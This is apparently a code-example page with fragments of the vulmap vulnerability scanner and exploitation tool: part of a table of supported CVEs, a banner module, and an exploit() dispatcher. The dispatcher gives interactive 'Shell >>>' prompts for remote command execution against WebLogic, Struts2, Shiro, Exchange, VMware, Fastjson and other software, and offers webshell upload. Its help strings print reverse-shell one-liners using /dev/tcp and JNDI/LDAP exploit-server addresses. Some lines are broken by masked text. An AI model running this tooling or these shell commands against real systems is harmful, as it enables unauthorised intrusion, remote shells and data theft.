 | Oracle Weblogic   | CVE-2018-2894    |  Y  |  Y  | 12.1.3.0, 12.2.1.2-3, deserialization any file upload       |
 | Oracle Weblogic   | CVE-2018-3191    |  Y  |  N  | 10.3.6.0, 12.1.3.0, 12.2.1.3, t3 deserialization rce        |
 | Oracle Weblogic   | CVE-2019-2725    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |
 | Oracle Weblogic   | CVE-2019-2890    |  Y  |  N  | 10.3.6.0, 12.1.3.0, 12.2.1.3, t3 deserialization rce        |
 | Oracle Weblogic   | CVE-2019-2729    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |
 | Oracle Weblogic   | CVE-2020-2551    |  Y  |  N  | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |
 | Oracle Weblogic   | CVE-2020-2555    |  Y  |  Y  | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce  |
 | Oracle Weblogic   | CVE-2020-2883    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |
 | Oracle Weblogic   | CVE-2020-14882   |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0, console rce       |
 | Oracle Weblogic   | CVE-2020-2109    |  Y  |  Y  | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0, unauthorized jndi |
 | QiAnXin           | time-2021-0410   |  Y  |  Y  | qianxin ns-ngfw netkang next generation firewall front rce  |
 | RedHat JBoss      | CVE-2010-0738    |  Y  |  Y  | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |
 | RedHat JBoss      | CVE-2010-1428    |  Y  |  Y  | 4.2.0 - 4.3.0, web-console deserialization any files upload |
 | RedHat JBoss      | CVE-2015-7501    |  Y  |  Y  | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |
 | RuiJie            | time_2021_0424   |  Y  |  N  | get account password, background rce                        |
 | Saltstack         | CVE-2021-25282   |  Y  |  Y  | < 3002.5, saltStack arbitrary file writing vulnerability    |
 | Spring Data       | CVE-2018-1273    |  Y  |  Y  | 1.13 - 1.13.10, 2.0 - 2.0.5, spring data commons rce        |
 | Spring Cloud      | CVE-2019-3799    |  Y  |  Y  | 2.1.0-2.1.1, 2.0.0-2.0.3, 1.4.0-1.4.5, directory traversal  |
 | Spring Cloud      | CVE-2020-5410    |  Y  |  Y  | < 2.2.3, < 2.1.9, directory traversal vulnerability         |
 | ThinkPHP          | CVE-2019-9082    |  Y  |  Y  | < 3.2.4, thinkphp rememberme deserialization rce            |
 | ThinkPHP          | CVE-2018-20062   |  Y  |  Y  | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce  |
 | Vmware vCenter    | time-2020-1013   |  Y  |  N  | <= 6.5u1, vmware vcenter arbitrary file reading (not cve)   |
 | Vmware vCenter    | CVE-2021-21972   |  Y  |  Y  | 7.0 < 7.0U1c, 6.7 < 6.7U3l, 6.5 < 6.5U3n, any file upload   |
 | VMware vRealize   | CVE-2021-21975   |  Y  |  N  | <= 8.3.0, vmware vrealize operations manager api ssrf       |
 +-------------------+------------------+-----+-----+-------------------------------------------------------------+
    """ + color.yellow("\n Vulmap release does not provide the exploit function after September 1, 2021 \n"))
    return vuln_list

Esempio n. 5

Mostra file

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# author: zhzyker
# github: https://github.com/zhzyker/vulmap
from module.color import color
import random

banner_1 = color.yellow("""                   __
                  [  |                              
  _   __  __   _   | |  _ .--..--.   ,--.  _ .--.   
 [ \ [  ][  | | |  | | [ `.-. .-. | `'_\ :[ '/'`\ \ 
  \ \/ /  | \_/ |, | |  | | | | | | // | |,| \__/ | 
   \__/   '.__.'_/[___][___||__||__]\'-;__/| ;.___/  
                                          [__|""")

banner_2 = color.yellow(r'''
                                +---------------+
 How to find vulnerabilities?   |    vulmap     |
                                +---------------+ 
    (╯▔＾▔)╯                        \ (•◡ •) / 
     \   |                            |   /
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣''')


def banner():
    o_o = random.choice(range(10))
    if o_o == 0:
        return banner_1
    elif o_o == 1:
        return banner_1
    elif o_o == 2:

Esempio n. 6

Mostra file

def exploit(target, vul_num):
    target = url_check(target)
    if survival_check(target) == "f":
        print(
            now.timed(de=0) + color.red_warn() +
            color.red(" Survival check failed: " + target))
        exit(0)
    delay = globals.get_value("DELAY")  # 获取全局变量DELAY
    exp_apache_shiro = ApacheShiro(target)
    exp_apache_solr = ApacheSolr(target)
    exp_apache_tomcat = ApacheTomcat(target)
    exp_elasticsearch = Elasticsearch(target)
    exp_apache_flink = ApacheFlink(target)
    exp_jenkins = Jenkins(target)
    exp_spring = Spring(target)
    exp_nexus = Nexus(target)
    exp_oracle_weblogic = OracleWeblogic(target)
    exp_redhat_jboss = RedHatJBoss(target)
    exp_apache_unomi = ApacheUnomi(target)
    exp_thinkphp = ThinkPHP(target)
    exp_drupal = Drupal(target)
    exp_fastjson = Fastjson(target)
    exp_apache_struts2 = ApacheStruts2(target)
    exp_apache_druid = ApacheDruid(target)
    exp_laravel = Laravel(target)
    exp_vmware = Vmware(target)
    exp_saltstack = SaltStack(target)
    exp_exchange = Exchange(target)
    exp_big_ip = BIG_IP(target)
    exp_apache_ofbiz = ApacheOFBiz(target)
    exp_qianxin = QiAnXin(target)
    exp_eyou = Eyou(target)
    exp_ecology = Ecology(target)
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Target url: " + target))
    print(
        now.timed(de=delay) + color.yel_info() +
        color.cyan(" Use exploit modules: " + vul_num))
    nc = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"nc\" bounce linux shell")
    up = now.timed(de=0) + color.yel_info() + color.yellow(
        " input \"upload\" upload webshell")
    rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(
        " RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
    bash = now.timed(de=0) + color.yel_info() + color.yellow(
        " nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
    bash_2 = now.timed(de=0) + color.yel_info() + color.yellow(
        " nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\""
    )
    jndi = now.timed(de=0) + color.yel_info() + color.yellow(
        " Reference https://github.com/feihong-cs/JNDIExploit")
    cmd = "whoami"  # 为了消除pycharm错误提示，没啥用
    file = "/etc/passwd"  # 为了消除pycharm错误提示，没啥用
    path = "/tmp/test"  # 为了消除pycharm错误提示，没啥用
    shiro_key = "1"  # 为了消除pycharm错误提示，没啥用
    shiro_gadget = "1"  # 为了消除pycharm错误提示，没啥用
    nexus_u = "admin"  # 为了消除pycharm错误提示，没啥用
    nexus_p = "admin"  # 为了消除pycharm错误提示，没啥用
    laravel_key = "null"  # 为了消除pycharm错误提示，没啥用
    laravel_gadget = 1  # 为了消除pycharm错误提示，没啥用

    if vul_num not in explists:
        print(
            now.timed(de=0) + color.red_warn() + color.red(
                " The vulnerability does not support exploitation. Please refer to \"--list\""
            ))
        sys.exit(0)

    elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
        if os_check() == "linux" or os_check() == "other":
            shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
            shiro_gadget = input(
                now.timed(de=delay) + color.green("[+] gadget: "))
        elif os_check() == "windows":
            shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
            shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
    elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: WEB-INF/web.xml"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_tomcat.cve_2020_1938_exp(file)
    elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2019_3799_exp(file)
    elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_spring.cve_2020_5410_exp(file)
    elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
        print(
            now.timed(de=delay) + color.yel_info() +
            color.yellow(" Examples: /etc/passwd"))
        while True:
            if os_check() == "linux" or os_check() == "other":
                file = input(
                    now.timed(de=delay) + color.green("[+] File >>> "))
            elif os_check() == "windows":
                file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
            if file == "exit" or file == "quit" or file == "bye":
                exit(0)
            exp_apache_flink.cve_2020_17519_exp(file)
    elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
        if os_check() == "linux" or os_check() == "other":
            nexus_u = input(
                now.timed(de=delay) + color.green("[+] Input username: "******"[+] Input password: "******"windows":
            nexus_u = input(
                now.no_color_timed(de=delay) + "[+] Input username: "******"[+] Input password: "******"linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)
    elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133":
        if os_check() == "linux" or os_check() == "other":
            laravel_key = input(
                now.timed(de=delay) + color.green("[+] Input APP_KEY: "))
        elif os_check() == "windows":
            laravel_key = input(
                now.no_color_timed(de=delay) + "[+] Input APP_KEY: ")
        if os_check() == "linux" or os_check() == "other":
            laravel_gadget = input(
                now.timed(de=delay) + color.green(
                    "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): "))
        elif os_check() == "windows":
            laravel_gadget = input(
                now.no_color_timed(de=delay) +
                "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget)
    elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972":
        if os_check() == "linux" or os_check() == "other":
            os_type = input(
                now.timed(de=delay) +
                color.green("[+] The target os type (linux/windows): "))
        elif os_check() == "windows":
            os_type = input(
                now.no_color_timed(de=delay) +
                "[+] The target os type (linux/windows): ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_vmware.cve_2021_21972_exp(cmd, os_type)
    elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282":
        if os_check() == "linux" or os_check() == "other":
            file = input(
                now.timed(de=delay) + color.green("[+] upload file: "))
            path = input(
                now.timed(de=delay) +
                color.green("[+] upload path (e.g. /tmp/test.txt): "))
        elif os_check() == "windows":
            file = input(now.no_color_timed(de=delay) + "[+] upload file: ")
            path = input(
                now.no_color_timed(de=delay) +
                "[+] upload path (e.g. /tmp/test.txt): ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_saltstack.cve_2021_25282_exp(cmd, file, path)
    elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065":
        if os_check() == "linux" or os_check() == "other":
            email = input(now.timed(de=delay) + color.green("[+] email: "))
            file = input(
                now.timed(de=delay) +
                color.green("[+] webshell name (e.g. shell.aspx): "))
        elif os_check() == "windows":
            email = input(now.timed(de=delay) + "[+] email: ")
            file = input(
                now.no_color_timed(de=delay) +
                "[+] uwebshell name (e.g. shell.aspx: ")
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_exchange.cve_2021_27065_exp(cmd, file, email)
    elif vul_num == "CVE-2021-2109" or vul_num == "cve-2021-2109":
        print(jndi)
        if os_check() == "linux" or os_check() == "other":
            ldap = input(
                now.timed(de=delay) + color.green(
                    "[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): "
                ))
        elif os_check() == "windows":
            ldap = input(
                now.no_color_timed(de=delay) + color.green(
                    "[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): "
                ))
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(now.timed(de=delay) + "[+] Shell >>> ")
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                sys.exit(0)
            exp_oracle_weblogic.cve_2021_2109_exp(ldap, cmd)

    # 远程命令执行漏洞单独简单运行
    else:
        while True:
            if os_check() == "linux" or os_check() == "other":
                cmd = input(
                    now.timed(de=delay) + color.green("[+] Shell >>> "))
            elif os_check() == "windows":
                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
            if cmd == "exit" or cmd == "quit" or cmd == "bye":
                exit(0)
            elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
                exp_apache_tomcat.cve_2017_12615_exp(cmd)
            elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
                exp_elasticsearch.cve_2014_3120_exp(cmd)
            elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
                exp_elasticsearch.cve_2015_1427_exp(cmd)
            elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
                exp_jenkins.cve_2018_1000861_exp(cmd)

            elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
                exp_oracle_weblogic.cve_2017_3506_exp(cmd)
            elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2017_10271_exp(cmd)
            elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
                exp_oracle_weblogic.cve_2018_2894_exp(cmd)
            elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
                print(nc)
                print(up)
                exp_oracle_weblogic.cve_2019_2725_exp(cmd)
            elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
                print(nc)
                exp_oracle_weblogic.cve_2019_2729_exp(cmd)
            elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
                exp_oracle_weblogic.cve_2020_2555_exp(cmd)
            elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
                exp_oracle_weblogic.cve_2020_2883_exp(cmd)
            elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
                exp_oracle_weblogic.cve_2020_14882_exp(cmd)
            elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
                exp_apache_solr.cve_2017_12629_exp(cmd)
            elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
                exp_apache_solr.cve_2019_17558_exp(cmd)
            elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
                exp_nexus.cve_2019_7238_exp(cmd)
            elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
                exp_redhat_jboss.cve_2010_0738_exp(cmd)
            elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
                exp_redhat_jboss.cve_2010_1428_exp(cmd)
            elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
                exp_redhat_jboss.cve_2015_7501_exp(cmd)
            elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
                exp_apache_unomi.cve_2020_13942_exp(cmd)

            elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
                print(up)
                exp_thinkphp.cve_2019_9082_exp(cmd)
            elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
                exp_thinkphp.cve_2018_20062_exp(cmd)
            elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
                exp_drupal.cve_2018_7600_exp(cmd)
            elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
                exp_drupal.cve_2018_7602_exp(cmd)
            elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
                exp_drupal.cve_2019_6340_exp(cmd)

            elif vul_num == "S2-005" or vul_num == "s2-005":
                exp_apache_struts2.s2_005_exp(cmd)
            elif vul_num == "S2-008" or vul_num == "s2-008":
                exp_apache_struts2.s2_008_exp(cmd)
            elif vul_num == "S2-009" or vul_num == "s2-009":
                exp_apache_struts2.s2_009_exp(cmd)
            elif vul_num == "S2-013" or vul_num == "s2-013":
                exp_apache_struts2.s2_013_exp(cmd)
            elif vul_num == "S2-015" or vul_num == "s2-015":
                exp_apache_struts2.s2_015_exp(cmd)
            elif vul_num == "S2-016" or vul_num == "s2-016":
                exp_apache_struts2.s2_016_exp(cmd)
            elif vul_num == "S2-029" or vul_num == "s2-029":
                exp_apache_struts2.s2_029_exp(cmd)
            elif vul_num == "S2-032" or vul_num == "s2-032":
                exp_apache_struts2.s2_032_exp(cmd)
            elif vul_num == "S2-045" or vul_num == "s2-045":
                exp_apache_struts2.s2_045_exp(cmd)
            elif vul_num == "S2-046" or vul_num == "s2-046":
                exp_apache_struts2.s2_046_exp(cmd)
            elif vul_num == "S2-048" or vul_num == "s2-048":
                exp_apache_struts2.s2_048_exp(cmd)
            elif vul_num == "S2-052" or vul_num == "s2-052":
                exp_apache_struts2.s2_052_exp(cmd)
            elif vul_num == "S2-057" or vul_num == "s2-057":
                exp_apache_struts2.s2_057_exp(cmd)
            elif vul_num == "S2-059" or vul_num == "s2-059":
                exp_apache_struts2.s2_059_exp(cmd)
            elif vul_num == "S2-061" or vul_num == "s2-061":
                exp_apache_struts2.s2_061_exp(cmd)
            elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
                exp_apache_struts2.s2_devMode_exp(cmd)

            elif vul_num == "VER-1224-1" or vul_num == "ver-1224-1":
                print(rmi_ldap)
                exp_fastjson.fastjson_1224_1_exp(cmd)
            elif vul_num == "VER-1224-2" or vul_num == "ver-1224-2":
                exp_fastjson.fastjson_1224_2_exp(cmd)
            elif vul_num == "VER-1224-3" or vul_num == "ver-1224-3":
                exp_fastjson.fastjson_1224_3_exp(cmd)
            elif vul_num == "VER-1247" or vul_num == "ver-1247":
                print(rmi_ldap)
                exp_fastjson.fastjson_1247_exp(cmd)
            elif vul_num == "VER-1262" or vul_num == "ver-1262":
                print(rmi_ldap)
                exp_fastjson.fastjson_1262_exp(cmd)
            elif vul_num == "CVE-2021-25646" or vul_num == "cve-2021-25646":
                print(bash_2)
                exp_apache_druid.cve_2021_25646_exp(cmd)
            elif vul_num == "CVE-2021-22986" or vul_num == "cve-2021-22986":
                exp_big_ip.cve_2021_22986_exp(cmd)
            elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902":
                print(
                    now.timed(de=delay) + color.yel_info() +
                    color.yellow(" Examples: /etc/passwd"))
                exp_big_ip.cve_2020_5902_exp(cmd)
            elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295":
                print(
                    now.timed(de=delay) + color.yel_info() + color.yellow(
                        " java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"
                    ))
                exp_apache_ofbiz.cve_2021_26295_exp(cmd)
            elif vul_num == "CVE-2021-30128" or vul_num == "cve-2021-30128":
                print(
                    now.timed(de=delay) + color.yel_info() + color.yellow(
                        " java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"
                    ))
                exp_apache_ofbiz.cve_2021_30128_exp(cmd)
            elif vul_num == "time-2021-0410" or vul_num == "TIME-2021-0410":
                exp_qianxin.time_2021_0410_exp(cmd)
            elif vul_num == "CNVD-2021-26422" or vul_num == "cnvd-2021-26422":
                exp_eyou.cnvd_2021_26422_exp(cmd)
            elif vul_num == "time-2021-0515" or vul_num == "TIME-2021-0515":
                exp_ecology.time_2021_0515_exp(cmd)

            else:
                pass